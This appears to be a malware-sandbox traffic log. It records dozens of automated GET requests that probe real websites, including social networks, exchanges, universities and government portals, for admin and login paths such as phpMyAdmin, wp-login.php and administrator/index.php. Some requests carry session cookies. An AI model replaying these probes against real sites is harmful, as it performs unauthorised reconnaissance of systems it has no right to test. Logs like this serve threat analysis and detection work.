                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://accounts.google.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gitam.zoom.usAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=9aWbkbPT4DdlgG_jg44HMc41AE1.59S3JcFtxwJ.xgU-1707131766-1-AerVx9RXy0Zm7OnurxzYuId07SlHkitQXtOcQmpWK47Y6f+CHIBXVtzdIORdzJ1w/NBTDnTUsLHOaZpdNAQ/zfs=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: terna.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: app.plex.tvAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.0Host: signin.rockstargames.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: tiktok.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EDDAF7B9110B0A46B575850AB86F0E3E0AEC9356593FDDBE1D721FD3E4C0BAB24User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipCookie: osCsid=a1aabfac7a1f7e8705602ed881881037User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: us04web.zoom.usAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=1iAg.jaqOry6c7AW1l9FRRQzGRAhyUaJmOXCMdnuwVs-1707131767-1-AXN1T055F/0qPV5xho0c5Hp5aAPUnzpxyaVcvCdaYwqNFgvDA63Qh9s5qsoOO8s0XQO1pfqrAc0csWoMqMsU+Ok=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://us04web.zoom.us/wp-login.php
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.0Host: upsconline.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: bonga20120608=d4b62ea767f8c27a8f51fe1000153277; ts_type2=1; __cf_bm=sPKSaJvRUxAcg1PEcdR35O5GebQF9IpP_4Igj06Qn1U-1707131767-1-AfutacbLjRJXJ/HlVv4ccDZ2KwcLDrWfFrasoUlTJQoQXwrk+mYT9PLaGfsipxqCCZnwBC6f5dRn/AaHcx7pL3Q=; uh=IHSAIQqQLaWbpmumq0cKLxuvMUS0Hj==; fv=AmL3ZGZkAmN3ZD==User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: deflate, gzipCookie: __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://mega.nz/wp-login.php
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: sport.autoplay.cloudAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=YOyxb9aU78NaI96z2sr4QbRuq80T5iBgvIchIzUA8sc-1707131767-1-AeL6bfGfUZ6U/Ap1Ak+vwqFlIGc33k6j5+9DW+6potT7/e/iNxD6laTBd7Qn7PszDDObqSeT9QEqBj5vyiFCIYY=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: instructory.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: testconnect.garena.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.analvids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: aeaaamorim.inovarmais.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: netizion.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: uh.isAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: warriorplus.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: m.codere.com.coAccept: */*Accept-Encoding: deflate, gzipCookie: incap_ses_1816_2786379=WqiPd+MpAh7vehA+arozGXfDwGUAAAAAf0zscGSg46veBuMVqud6tA==; visid_incap_2786379=5tag4wo4T1GfIO+elp7EN3fDwGUAAAAAQUIPAAAAAAB4BLkAhZmiG4QXdfRN9Zxs; nlbi_2786379=xtV/OHOIMD7ou0OAaJQkpgAAAAAeL0CQftwLs0ZTw13GYZzvUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: poligrafosecuador.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=KQdoXLmOQJcbKhseP.EtWw3LEkzLnC8sr1PsAAKoLRQ-1707131766-1-AcAdZDV71hWzvP/naP9SO7zlMUviMxenx2XZEG+PYPwmGnbNdLYV5lTQ80fTSr2r8GyBcPqDeaCsRfND4BxM5tI=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mw.redsa.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mojadovera.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: cloud.simplify3d.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mobilsam.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.phonandroid.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mitextoescolar.mineduc.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: sport.autoplay.cloudAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=rFUJfVj1Ep.q_B9GVJgxzRAsmv8ckHLmwIsjPmWiRVg-1707131766-1-AY/3/Y1ibVQoZ02SpACliRC5KzwLKzUsJaFlR0Fp8h0OnCoU9JdfgWjzL8hsfJH31BsORQsD0Bm2yRzlPv66gM0=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.0Host: ssc.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: instructory.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: login2.innova.puglia.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: JSESSIONID=A41748C5FFBE0AA3717601AC030D7592; BbRouter=expires:1707142568,id:AA5B0F56EE09038D64C6A202F41CF905,signature:a5b7125ed6ba37cb61202ccfee1c2f3a72304b38c669361818b7f385ffa34717,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:16c6130f-60d2-4ae4-9489-4e6878a2dd45; AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://ucv.blackboard.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: bonga20120608=c698aa81d303b6657c01a45b96f05fa3; ts_type2=1; __cf_bm=KQdoXLmOQJcbKhseP.EtWw3LEkzLnC8sr1PsAAKoLRQ-1707131766-1-AcAdZDV71hWzvP/naP9SO7zlMUviMxenx2XZEG+PYPwmGnbNdLYV5lTQ80fTSr2r8GyBcPqDeaCsRfND4BxM5tI=; uh=GJAABKqyLmuAoJAgHyukJwOxoaSVDt==; fv=ZQp3ZGZkAmN3ZD==User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://pxndx-mcr.boletia.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: deflate, gzipCookie: __sdcfduid=f7108151c41711eea0b60fe64c998bd492e66eddc076b200708bdc05ed2cbe73d6bf4f0f17b0d993defd8d35f71a55a6; __dcfduid=f7108150c41711eea0b60fe64c998bd4; __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://discord.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET /pma HTTP/1.1Host: cjdropshipping.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.0Host: oferta.senasofiaplus.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /academico/phpMyAdmin/ HTTP/1.1Host: academico.um.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sistemas.pa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.uh.isAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: eei.uniandes.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /en/phpmyadmin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: bonga20120608=df106ebcbffc1861ca322b6f3f8633ab; ts_type2=1; __cf_bm=hYI9uaB5o1Z9vOPanp05auLoaQukIGLPJXDgF1LPBXk-1707131770-1-AV82M4ZN3NGdbY1RWqCn2CYbGXaWAtlSiuSCRk+M1uMz6ANcyYTABpz0ar3eNHcldxpImA+s0kWuevSh8Lkq75k=; uh=FyE6pTEiExAnn0c6AKy6A2cAoJquHD==; fv=ZQp3ZGZkAmN3ZD==User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /academico/login HTTP/1.1Host: academico.um.edu.mxAccept: */*Accept-Encoding: deflate, gzipCookie: JSESSIONID=8762699CA49BCC3318B1609C54D1F4A0User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: idp.uitgeverij-deviant.nlAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipCookie: datr=e8PAZQti-we2Cxw2VrrmnDbW; ps_n=0; ps_l=0User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://m.facebook.com/wp-login.php?locale=hi_IN&_rdr
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /en/wp-admin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipCookie: osCsid=75ead7575354d04015590554959bc526User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://account.booking.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.0Host: signin.rockstargames.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
